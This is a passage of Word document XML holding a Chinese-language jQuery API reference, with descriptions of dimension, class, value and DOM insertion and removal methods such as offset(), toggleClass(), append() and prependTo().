        <w:t>，或者将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为每个元素的方法调用后计算出的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>innerHeight():int</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回第一个选中元素的高度加上内边距。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>innerWidth():int</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回第一个选中元素的宽度加上内边距。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>offset():coords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>offset(coords)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>offset(f(idx,current):coords)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回第一个选中元素（在）的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>位置，或者将所有选中元素的位置设为</w:t>
      </w:r>
      <w:r>
        <w:t>coords</w:t>
      </w:r>
      <w:r>
        <w:t>或将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为每个元素的方法调用计算出来的值。坐标是一个对象，具有</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>offsetParent():jQuery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择距离每个选中元素位置最近的祖先元素，并在一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中返回它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>outerHeight([margins=false]):int</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回第一个选中元素的高度加内边距和边框的值，如果</w:t>
      </w:r>
      <w:r>
        <w:t>margins</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则再加上外边距。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>outerWidth([margins=false]):int</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回第一个选中元素的宽度加内边距和边框的值，如果</w:t>
      </w:r>
      <w:r>
        <w:t>margins</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则再加上外边距。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>position():coords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回第一个选中元素相对于它位置最近的祖先的位置。返回值是一个带</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>属性的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>removeAttr(name)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从所有选中元素中移除指定名字的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>removeClass(names)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>removeClass(f(idx,current):names)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从所有选中元素的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性中移除一个或多个指定的类名。如果传入的不是字符串而是函数，则将它作为每个元素的方法调</w:t>
      </w:r>
      <w:r>
        <w:t>用并生成要删除的一个或多个类名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>removeData([key])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从每个选中元素的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>对象中删除指定名字的属性。如果没有指定属性名，则删除整个</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>scrollLeft():int</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>scrollLeft(int)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回第一个选中元素的水平滚动条的位置，或者设置所有选中元素的水平滚动条的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>scrollTop():int</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>scrollTop(int)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回第一个选中元素的垂直滚动条的位置，或者设置所有选中元素的垂直滚动条的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toggleClass(names,[add])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toggleClass(f(idx,current):names,[add])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>切换每个选中元素的一个或多个指定类名。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，则将它作为每个选中元素的方法调用以便计算出要切换的一个或多个类名。如果</w:t>
      </w:r>
      <w:r>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则添加或删除对应的类名，而不是切换它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>val():value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>val(value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>val(f(idx,current)):value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回第一个选中元素的表单值或选中状态，或将所有选中元素的值或选中状态设置为</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>或者将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为每个元素的方法调用计算出的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>width():int</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>width(w)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>width(f(idx,current):int)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回第一个选中元素的宽度（不包括内边距、边框和外边距），或将所有选中元素的宽度设置为</w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>，或将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为每个元素的方法调用计算出的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>插入及删除方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这儿描述的方法将插入、删除或替换文档内容。在下面的方法声明中，参数</w:t>
      </w:r>
      <w:r>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:t>可能是一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象、一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>字符串或者一个独立的文档元素，参数</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>可能是一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象、一个独立的文档元素或者一个选择器字符串。更多细节请参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.2.5</w:t>
      </w:r>
      <w:r>
        <w:t>节或</w:t>
      </w:r>
      <w:r>
        <w:t>19.3</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>after(content)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>after(f(idx):content)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在每个选中元素后面插入</w:t>
      </w:r>
      <w:r>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:t>，或者将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为每个选中元素的方法调用，并将它的返回值插入到每个对应选中元素后面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>append(content)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>append(f(idx,html):content)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:t>追加到每个选中的元素后面，或将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为每个选中元素的方法调用，将将它的返回值追加到每个选中元素后面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>appendTo(target):jQuery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将选中元素追加到每个指定</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>元素的尾部，如</w:t>
      </w:r>
      <w:r>
        <w:t>果有多个目标，必要时复制选中元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>before(content)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>before(f(idx):content)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:t>after()</w:t>
      </w:r>
      <w:r>
        <w:t>，但在选中元素之前而不是之后插入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>clone([data=false]):jQuery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对每个选中元素进行尝试复制，返回一个表示这些复制对象的新</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则也会复制选中元素对应的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>（包含事件处理程序）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>detach([sel])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
      <w:r>
        <w:t>，但不删除分离元素对应的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>empty()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>删除所有选中元素的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>htm</w:t>
      </w:r>
      <w:r>
        <w:t>l():string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>html(htmlText)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>html(f(idx,current):htmlText)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果不带参数，则将第一个选中元素以</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>格式化的字符串返回。如果传入一个参数，则将所有选中元素的内容设置为指定的</w:t>
      </w:r>
      <w:r>
        <w:t>htmlText</w:t>
      </w:r>
      <w:r>
        <w:t>，或者设置为将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为这些元素的方法调用时的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>insertAfter(target):jQuery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在每个</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>元素之后插入选中的元素，如果有多个目标，必要时复制选中元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>insertBefore(target):jQuery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在每个</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>元素之前插入选中的元素，如果有多个目标，必要时复制选中元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>prepend(content)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>prepend(f(idx,html):content)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>append()</w:t>
      </w:r>
      <w:r>
        <w:t>，但它在每个选中元素的开头部分插入</w:t>
      </w:r>
      <w:r>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是在结尾部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>prependTo(target):jQuery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>appendTo()</w:t>
      </w:r>
      <w:r>
        <w:t>，除了选中元素是插入到目标元素的开头部分而不是结尾部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
